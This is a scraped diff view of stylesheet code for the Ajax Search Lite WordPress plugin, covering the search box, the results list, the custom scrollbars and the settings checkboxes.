cursor:pointer;
|
330 |
+
float:left;
|
331 |
+
}
|
332 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonRight{
|
333 |
+
right:0;
|
334 |
+
bottom:auto;
|
335 |
+
margin-left:-40px;
|
336 |
+
margin-top:-16px;
|
337 |
+
float:right;
|
338 |
+
}
|
339 |
+
|
340 |
+
|
341 |
+
#ajaxsearchliteres .mCustomScrollBox .mCSB_scrollTools{
|
342 |
+
opacity:0.75;
|
343 |
+
}
|
344 |
+
#ajaxsearchliteres .mCustomScrollBox:hover .mCSB_scrollTools{
|
345 |
+
opacity:1;
|
346 |
+
}
|
347 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerRail{
|
348 |
+
background:#000; /* rgba fallback */
|
349 |
+
background:rgba(0,0,0,0.4);
|
350 |
+
filter:"alpha(opacity=40)"; -ms-filter:"alpha(opacity=40)"; /* old ie */
|
351 |
+
}
|
352 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
353 |
+
background:#fff; /* rgba fallback */
|
354 |
+
background:rgba(255, 255, 255,0.9);
|
355 |
+
filter:"alpha(opacity=90)"; -ms-filter:"alpha(opacity=90)"; /* old ie */
|
356 |
+
}
|
357 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger:hover .mCSB_dragger_bar{
|
358 |
+
background:rgba(255, 255, 255,0.95);
|
359 |
+
filter:"alpha(opacity=95)"; -ms-filter:"alpha(opacity=95)"; /* old ie */
|
360 |
+
}
|
361 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger:active .mCSB_dragger_bar,
|
362 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger.mCSB_dragger_onDrag .mCSB_dragger_bar{
|
363 |
+
background:rgba(255, 255, 255,1);
|
364 |
+
filter:"alpha(opacity=100)"; -ms-filter:"alpha(opacity=100)"; /* old ie */
|
365 |
+
}
|
366 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp,
|
367 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown,
|
368 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft,
|
369 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight{
|
370 |
+
padding: 10px 0 0 0;
|
371 |
+
background:0;
|
372 |
+
opacity:0.4;
|
373 |
+
filter:"alpha(opacity=40)"; -ms-filter:"alpha(opacity=40)"; /* old ie */
|
374 |
+
}
|
375 |
+
|
376 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown { height:0;position: relative; }
|
377 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:after { top: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute;}
|
378 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:after { border-color: rgba(136, 183, 213, 0); border-top-color: #0a3f4d; border-width: 8px; left: 50%; margin-left: -8px; }
|
379 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp { position: relative; margin:10px 0 0 0; height: 0; }
|
380 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:after { bottom: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; }
|
381 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:after { border-color: rgba(136, 183, 213, 0); border-bottom-color: #0a3f4d; border-width: 8px; left: 50%; margin-left: -8px; }
|
382 |
+
|
383 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp{
|
384 |
+
background-position:0 0;
|
385 |
+
/*
|
386 |
+
sprites locations are 0 0/-16px 0/-32px 0/-48px 0 (light) and -80px 0/-96px 0/-112px 0/-128px 0 (dark)
|
387 |
+
*/
|
388 |
+
}
|
389 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
390 |
+
background-position:0 -20px;
|
391 |
+
/*
|
392 |
+
sprites locations are 0 -20px/-16px -20px/-32px -20px/-48px -20px (light) and -80px -20px/-96px -20px/-112px -20px/-128px -20px (dark)
|
393 |
+
*/
|
394 |
+
}
|
395 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft{
|
396 |
+
background-position:0 -40px;
|
397 |
+
/*
|
398 |
+
sprites locations are 0 -40px/-20px -40px/-40px -40px/-60px -40px (light) and -80px -40px/-100px -40px/-120px -40px/-140px -40px (dark)
|
399 |
+
*/
|
400 |
+
}
|
401 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight{
|
402 |
+
background-position:0 -56px;
|
403 |
+
/*
|
404 |
+
sprites locations are 0 -56px/-20px -56px/-40px -56px/-60px -56px (light) and -80px -56px/-100px -56px/-120px -56px/-140px -56px (dark)
|
405 |
+
*/
|
406 |
+
}
|
407 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:hover,
|
408 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:hover,
|
409 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft:hover,
|
410 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight:hover{
|
411 |
+
opacity:0.75;
|
412 |
+
filter:"alpha(opacity=75)"; -ms-filter:"alpha(opacity=75)"; /* old ie */
|
413 |
+
}
|
414 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp:active,
|
415 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown:active,
|
416 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonLeft:active,
|
417 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonRight:active{
|
418 |
+
opacity:0.9;
|
419 |
+
filter:"alpha(opacity=90)"; -ms-filter:"alpha(opacity=90)"; /* old ie */
|
420 |
+
}
|
421 |
+
|
422 |
+
#ajaxsearchliteres span.highlighted{
|
423 |
+
font-weight: bold;
|
424 |
+
color: #d9312b;
|
425 |
+
background-color: #eee;
|
426 |
+
color: #d9312b;
|
427 |
+
background-color: #eee;
|
428 |
+
}
|
429 |
+
|
430 |
+
#ajaxsearchlitesettings.searchsettings {
|
431 |
+
width: 200px;
|
432 |
+
height: auto;
|
433 |
+
background: #b4e0f4;
|
434 |
+
position: absolute;
|
435 |
+
display: none;
|
436 |
+
z-index: 1101;
|
437 |
+
border-radius: 0 0 3px 3px;
|
438 |
+
box-shadow: 2px 2px 3px -1px #AAAAAA;
|
439 |
+
visibility: hidden;
|
440 |
+
padding: 0 0 8px 0;
|
441 |
+
}
|
442 |
+
|
443 |
+
#ajaxsearchlitesettings.searchsettings .option {
|
444 |
+
margin: 10px;
|
445 |
+
*padding-bottom: 10px;
|
446 |
+
}
|
447 |
+
|
448 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option {
|
449 |
+
margin-bottom: 0 !important;
|
450 |
+
padding-bottom: 0 !important;
|
451 |
+
}
|
452 |
+
|
453 |
+
#ajaxsearchlitesettings.searchsettings .label {
|
454 |
+
float: left;
|
455 |
+
font-size: 14px;
|
456 |
+
line-height: 24px;
|
457 |
+
margin: 6px 10px 0 0;
|
458 |
+
width: 143px;
|
459 |
+
color: #333;
|
460 |
+
}
|
461 |
+
|
462 |
+
/* SQUARED THREE */
|
463 |
+
#ajaxsearchlitesettings.searchsettings .option input[type=checkbox] {
|
464 |
+
display:none;
|
465 |
+
}
|
466 |
+
|
467 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option input[type=checkbox] {
|
468 |
+
display:block;
|
469 |
+
}
|
470 |
+
|
471 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .label {
|
472 |
+
float:right !important;
|
473 |
+
}
|
474 |
+
|
475 |
+
#ajaxsearchlitesettings.searchsettings .option {
|
476 |
+
width: 20px;
|
477 |
+
position: relative;
|
478 |
+
float: left;
|
479 |
+
}
|
480 |
+
|
481 |
+
#ajaxsearchlitesettings.searchsettings .option label {
|
482 |
+
cursor: pointer;
|
483 |
+
position: absolute;
|
484 |
+
width: 20px;
|
485 |
+
height: 20px;
|
486 |
+
top: 0;
|
487 |
+
border-radius: 4px;
|
488 |
+
-webkit-box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
489 |
+
-moz-box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
490 |
+
box-shadow: inset 0px 1px 1px rgba(0,0,0,0.5), 0px 1px 0px rgba(255,255,255,.4);
|
491 |
+
background: #45484d;
|
492 |
+
background: -webkit-linear-gradient(top, #222222 0%, #45484d 100%);
|
493 |
+
background: -moz-linear-gradient(top, #222222 0%, #45484d 100%);
|
494 |
+
background: -o-linear-gradient(top, #222222 0%, #45484d 100%);
|
495 |
+
background: -ms-linear-gradient(top, #222222 0%, #45484d 100%);
|
496 |
+
background: linear-gradient(top, #222222 0%, #45484d 100%);
|
497 |
+
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#222222', endColorstr='#45484d',GradientType=0 );
|
498 |
+
}
|
499 |
+
|
500 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option label {
|
501 |
+
display:none;
|
502 |
+
}
|
503 |
+
|
504 |
+
#ajaxsearchlitesettings.searchsettings .option label:after {
|
505 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
|
506 |
+
filter: alpha(opacity=0);
|
507 |
+
opacity: 0;
|
508 |
+
content: '';
|
509 |
+
position: absolute;
|
510 |
+
width: 9px;
|
511 |
+
height: 5px;
|
512 |
+
background: transparent;
|
513 |
+
top: 4px;
|
514 |
+
left: 4px;
|
515 |
+
border: 3px solid #fcfff4;
|
516 |
+
border-top: none;
|
517 |
+
border-right: none;
|
518 |
+
|
519 |
+
-webkit-transform: rotate(-45deg);
|
520 |
+
-moz-transform: rotate(-45deg);
|
521 |
+
-o-transform: rotate(-45deg);
|
522 |
+
-ms-transform: rotate(-45deg);
|
523 |
+
transform: rotate(-45deg);
|
524 |
+
}
|
525 |
+
|
526 |
+
#ajaxsearchlitesettings.searchsettings.ie78 .option label:after {
|
527 |
+
display:none;
|
528 |
+
}
|
529 |
+
|
530 |
+
#ajaxsearchlitesettings.searchsettings .option label:hover::after {
|
531 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";
|
532 |
+
filter: alpha(opacity=30);
|
533 |
+
opacity: 0.3;
|
534 |
+
}
|
535 |
+
|
536 |
+
#ajaxsearchlitesettings.searchsettings .option input[type=checkbox]:checked + label:after {
|
537 |
+
-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
|
538 |
+
filter: alpha(opacity=100);
|
539 |
+
opacity: 1;
|
540 |
+
}
|
541 |
+
|
542 |
+
#ajaxsearchliteres .thumb .end,
|
543 |
+
#ajaxsearchliteres .thumb { background-color: #B4E0F4; border-radius: 20px; }
|
544 |
+
#ajaxsearchliteres .scrollbar { position: relative; float: right; width: 15px; border-radius: 0px; background: #FFF;}
|
545 |
+
#ajaxsearchliteres .track { background-color: #FFF; height: 100%; width:13px; position: relative; padding: 0 1px; border-radius: 0px; }
|
546 |
+
#ajaxsearchliteres .thumb { height: 20px; width: 13px; cursor: pointer; overflow: hidden; position: absolute; top: 0; }
|
547 |
+
#ajaxsearchliteres .thumb .end { overflow: hidden; height: 5px; width: 13px; }
|
548 |
+
#ajaxsearchliteres .disable{ display: none; }
|
549 |
+
#ajaxsearchliteres .viewport { position: relative; }
|
550 |
+
#ajaxsearchliteres .overview { left: 0; top: 0; }
|
css/style.css
ADDED
@@ -0,0 +1,624 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
.clear {
|
2 |
+
clear: both;
|
3 |
+
}
|
4 |
+
|
5 |
+
.hiddend {
|
6 |
+
display:none;
|
7 |
+
}
|
8 |
+
|
9 |
+
#ajaxsearchlite textarea:focus,
|
10 |
+
#ajaxsearchlite input:focus{
|
11 |
+
outline: none;
|
12 |
+
}
|
13 |
+
|
14 |
+
#ajaxsearchlite {
|
15 |
+
width: 100%;
|
16 |
+
height: 40px;
|
17 |
+
border-radius: 5px;
|
18 |
+
background: #d1eaff;
|
19 |
+
background: #ebebeb;
|
20 |
+
overflow: hidden;
|
21 |
+
border:0px solid #ebebeb;border-radius:0px 0px 0px 0px; box-shadow:0px 0px 0px 0px #858585 ;}
|
22 |
+
|
23 |
+
#ajaxsearchlite .probox {
|
24 |
+
width: auto;
|
25 |
+
margin: 4px;
|
26 |
+
height: 30px;
|
27 |
+
border-radius: 5px;
|
28 |
+
background: #FFF;
|
29 |
+
overflow: hidden;
|
30 |
+
border: 1px solid #FFF;
|
31 |
+
box-shadow: 1px 0 3px #CCCCCC inset;
|
32 |
+
background: #ffffff;
|
33 |
+
border:1px solid #d6d6d6;border-radius:0px 0px 0px 0px; box-shadow:0px 0px 0px 0px #ccc inset;}
|
34 |
+
|
35 |
+
#ajaxsearchlite .probox .proinput {
|
36 |
+
width: auto;
|
37 |
+
height: 100%;
|
38 |
+
margin: 2px 0px 0px 10px;
|
39 |
+
padding: 5px;
|
40 |
+
float: left;
|
41 |
+
box-shadow: none;
|
42 |
+
position: relative;
|
43 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#212121;font-size:12px;line-height:13px;}
|
44 |
+
|
45 |
+
#ajaxsearchlite .probox .proinput input {
|
46 |
+
border: 0px;
|
47 |
+
background: transparent;
|
48 |
+
width: 100%;
|
49 |
+
box-shadow: none;
|
50 |
+
margin: 0;
|
51 |
+
padding: 0;
|
52 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#212121;font-size:12px;line-height:13px;}
|
53 |
+
|
54 |
+
#ajaxsearchlite .probox .proinput input.autocomplete {
|
55 |
+
border: 0px;
|
56 |
+
background: transparent;
|
57 |
+
width: 100%;
|
58 |
+
box-shadow: none;
|
59 |
+
margin: 0;
|
60 |
+
padding: 0;
|
61 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#212121;font-size:12px;line-height:13px;}
|
62 |
+
|
63 |
+
#ajaxsearchlite .probox .proinput.iepaddingfix {
|
64 |
+
padding-top: 0;
|
65 |
+
}
|
66 |
+
|
67 |
+
#ajaxsearchlite .probox .proinput .loading {
|
68 |
+
width: 32px;
|
69 |
+
background: #000;
|
70 |
+
height: 100%;
|
71 |
+
box-shadow: none;
|
72 |
+
}
|
73 |
+
|
74 |
+
#ajaxsearchlite .probox .proloading,
|
75 |
+
#ajaxsearchlite .probox .promagnifier,
|
76 |
+
#ajaxsearchlite .probox .prosettings {
|
77 |
+
width: 32px;
|
78 |
+
height: 32px;
|
79 |
+
background: none;
|
80 |
+
float: right;
|
81 |
+
box-shadow: none;
|
82 |
+
margin: 0;
|
83 |
+
padding: 0;
|
84 |
+
}
|
85 |
+
|
86 |
+
#ajaxsearchlite .probox .proloading {
|
87 |
+
background: url("http://35.wp.wp-dreams.com/wp-content/plugins/ajax-search-pro/img/loading/loading3.gif") no-repeat;
|
88 |
+
background-position:center center;
|
89 |
+
visibility: hidden;
|
90 |
+
}
|
91 |
+
|
92 |
+
#ajaxsearchlite .probox .promagnifier {
|
93 |
+
background: url("http://35.wp.wp-dreams.com/wp-content/plugins/ajax-search-pro/img/magnifiers/magn3.png") no-repeat #ffffff;
|
94 |
+
background-position:center center;
|
95 |
+
cursor: pointer;
|
96 |
+
}
|
97 |
+
|
98 |
+
|
99 |
+
#ajaxsearchlite .probox .prosettings {
|
100 |
+
background: url("http://35.wp.wp-dreams.com/wp-content/plugins/ajax-search-pro/img/settings/settings10.png") no-repeat #ffffff;
|
101 |
+
background-position:center center;
|
102 |
+
cursor: pointer;
|
103 |
+
}
|
104 |
+
|
105 |
+
#ajaxsearchliteres {
|
106 |
+
padding: 4px;
|
107 |
+
background: #D1EAFF;
|
108 |
+
background: #ffffff;
|
109 |
+
border-radius: 3px;
|
110 |
+
border:1px solid #e0e0e0;border-radius:0px 0px 0px 0px; box-shadow:0px 0px 1px 0px #d9d9d9 ; position: absolute;
|
111 |
+
visibility: hidden;
|
112 |
+
z-index:1100;
|
113 |
+
}
|
114 |
+
|
115 |
+
#ajaxsearchliteres .results .nores {
|
116 |
+
overflow: hidden;
|
117 |
+
width: auto;
|
118 |
+
height: 100%;
|
119 |
+
line-height: auto;
|
120 |
+
text-align: center;
|
121 |
+
margin: 0;
|
122 |
+
background: #FFF;
|
123 |
+
}
|
124 |
+
|
125 |
+
#ajaxsearchliteres .results .nores .keyword{
|
126 |
+
padding: 0 6px;
|
127 |
+
cursor: pointer;
|
128 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#4a4a4a;font-size:13px;line-height:14px; font-weight: bold;
|
129 |
+
}
|
130 |
+
|
131 |
+
#ajaxsearchliteres .results {
|
132 |
+
overflow: hidden;
|
133 |
+
width: auto;
|
134 |
+
height: 0;
|
135 |
+
margin: 0;
|
136 |
+
padding: 0;
|
137 |
+
}
|
138 |
+
|
139 |
+
#ajaxsearchliteres .results .item {
|
140 |
+
overflow: hidden;
|
141 |
+
width: auto;
|
142 |
+
height: 70px;
|
143 |
+
margin: 0;
|
144 |
+
margin-bottom: -3px;
|
145 |
+
padding: 3px;
|
146 |
+
position: relative;
|
147 |
+
background: #f4f4f4;
|
148 |
+
background: #ffffff;
|
149 |
+
border-radius: 3px;
|
150 |
+
border-left: 1px solid rgba(255, 255, 255, 0.6);
|
151 |
+
border-right: 1px solid rgba(255, 255, 255, 0.4);
|
152 |
+
}
|
153 |
+
|
154 |
+
#ajaxsearchliteres .results .item:last-child {
|
155 |
+
margin-bottom: 0px;
|
156 |
+
}
|
157 |
+
|
158 |
+
|
159 |
+
#ajaxsearchliteres .results .item .image {
|
160 |
+
overflow: hidden;
|
161 |
+
width: 70px;
|
162 |
+
height: 70px;
|
163 |
+
background: #000;
|
164 |
+
background: #ffffff;
|
165 |
+
margin: 0;
|
166 |
+
padding: 0;
|
167 |
+
float: left;
|
168 |
+
}
|
169 |
+
|
170 |
+
#ajaxsearchliteres .results .item .content {
|
171 |
+
overflow: hidden;
|
172 |
+
width: 50%;
|
173 |
+
height: 70px;
|
174 |
+
background: #fff;
|
175 |
+
background: #ffffff;
|
176 |
+
margin: 0;
|
177 |
+
padding: 0 10px;
|
178 |
+
float: right;
|
179 |
+
}
|
180 |
+
|
181 |
+
#ajaxsearchliteres .results .item .content h3 {
|
182 |
+
margin: 0;
|
183 |
+
padding: 0;
|
184 |
+
line-height: inherit;
|
185 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
186 |
+
|
187 |
+
#ajaxsearchliteres .results .item .content h3 a span.overlap {
|
188 |
+
position:absolute;
|
189 |
+
width:100%;
|
190 |
+
height:100%;
|
191 |
+
top:0;
|
192 |
+
left: 0;
|
193 |
+
z-index: 1;
|
194 |
+
background-image: url('empty.gif');
|
195 |
+
}
|
196 |
+
|
197 |
+
#ajaxsearchliteres .results .item .content h3 a {
|
198 |
+
margin: 0;
|
199 |
+
padding: 0;
|
200 |
+
line-height: inherit;
|
201 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
202 |
+
|
203 |
+
#ajaxsearchliteres .results .item .content h3 a:hover {
|
204 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
205 |
+
|
206 |
+
#ajaxsearchliteres .results .item div.etc {
|
207 |
+
margin: 2px 3px;
|
208 |
+
padding: 0;
|
209 |
+
line-height: 10px;
|
210 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#a1a1a1;font-size:12px;line-height:13px;}
|
211 |
+
#ajaxsearchliteres .results .item .etc .author {
|
212 |
+
padding: 0;
|
213 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#a1a1a1;font-size:12px;line-height:13px;}
|
214 |
+
#ajaxsearchliteres .results .item .etc .date {
|
215 |
+
margin: 0 0 0 10px;
|
216 |
+
padding: 0;
|
217 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#adadad;font-size:12px;line-height:13px;
|
218 |
+
}
|
219 |
+
#ajaxsearchliteres .resdrg {
|
220 |
+
height: auto;
|
221 |
+
}
|
222 |
+
|
223 |
+
#ajaxsearchliteres .results .item p.desc {
|
224 |
+
margin: 2px 0px;
|
225 |
+
padding: 0;
|
226 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#4a4a4a;font-size:13px;line-height:14px;}
|
227 |
+
|
228 |
+
#ajaxsearchliteres .mCSB_container{
|
229 |
+
width:auto;
|
230 |
+
margin-right:20px;
|
231 |
+
overflow:hidden;
|
232 |
+
}
|
233 |
+
#ajaxsearchliteres .mCSB_container.mCS_no_scrollbar{
|
234 |
+
margin-right:0;
|
235 |
+
}
|
236 |
+
#ajaxsearchliteres .mCustomScrollBox .mCSB_scrollTools{
|
237 |
+
width:16px;
|
238 |
+
height:100%;
|
239 |
+
top:0;
|
240 |
+
right:0;
|
241 |
+
}
|
242 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerContainer{
|
243 |
+
height:100%;
|
244 |
+
-webkit-box-sizing:border-box;
|
245 |
+
-moz-box-sizing:border-box;
|
246 |
+
box-sizing:border-box;
|
247 |
+
}
|
248 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp+.mCSB_draggerContainer{
|
249 |
+
padding-bottom:40px;
|
250 |
+
}
|
251 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerRail{
|
252 |
+
width:10px;
|
253 |
+
height:100%;
|
254 |
+
margin:0 auto;
|
255 |
+
-webkit-border-radius:10px;
|
256 |
+
-moz-border-radius:10px;
|
257 |
+
border-radius:10px;
|
258 |
+
}
|
259 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger{
|
260 |
+
cursor:pointer;
|
261 |
+
width:100%;
|
262 |
+
height:30px;
|
263 |
+
}
|
264 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
265 |
+
width:10px;
|
266 |
+
height:100%;
|
267 |
+
margin:0 auto;
|
268 |
+
-webkit-border-radius:10px;
|
269 |
+
-moz-border-radius:10px;
|
270 |
+
border-radius:10px;
|
271 |
+
text-align:center;
|
272 |
+
}
|
273 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp,
|
274 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
275 |
+
height:20px;
|
276 |
+
-overflow:hidden;
|
277 |
+
margin:0 auto;
|
278 |
+
cursor:pointer;
|
279 |
+
}
|
280 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
281 |
+
bottom:0;
|
282 |
+
margin-top:-40px;
|
283 |
+
}
|
284 |
+
|
285 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_container{
|
286 |
+
height:auto;
|
287 |
+
margin-right:0;
|
288 |
+
margin-bottom:30px;
|
289 |
+
overflow:hidden;
|
290 |
+
}
|
291 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_container.mCS_no_scrollbar{
|
292 |
+
margin-bottom:0;
|
293 |
+
}
|
294 |
+
#ajaxsearchliteres .mCSB_horizontal.mCustomScrollBox .mCSB_scrollTools{
|
295 |
+
width:100%;
|
296 |
+
height:16px;
|
297 |
+
top:auto;
|
298 |
+
right:auto;
|
299 |
+
bottom:0;
|
300 |
+
left:0;
|
301 |
+
overflow:hidden;
|
302 |
+
}
|
303 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_draggerContainer{
|
304 |
+
height:100%;
|
305 |
+
width:auto;
|
306 |
+
-webkit-box-sizing:border-box;
|
307 |
+
-moz-box-sizing:border-box;
|
308 |
+
box-sizing:border-box;
|
309 |
+
overflow:hidden;
|
310 |
+
}
|
311 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonLeft+.mCSB_draggerContainer{
|
312 |
+
padding-bottom:0;
|
313 |
+
padding-right:20px;
|
314 |
+
}
|
315 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_draggerRail{
|
316 |
+
width:100%;
|
317 |
+
height:2px;
|
318 |
+
margin:7px 0;
|
319 |
+
-webkit-border-radius:10px;
|
320 |
+
-moz-border-radius:10px;
|
321 |
+
border-radius:10px;
|
322 |
+
}
|
323 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_dragger{
|
324 |
+
width:30px;
|
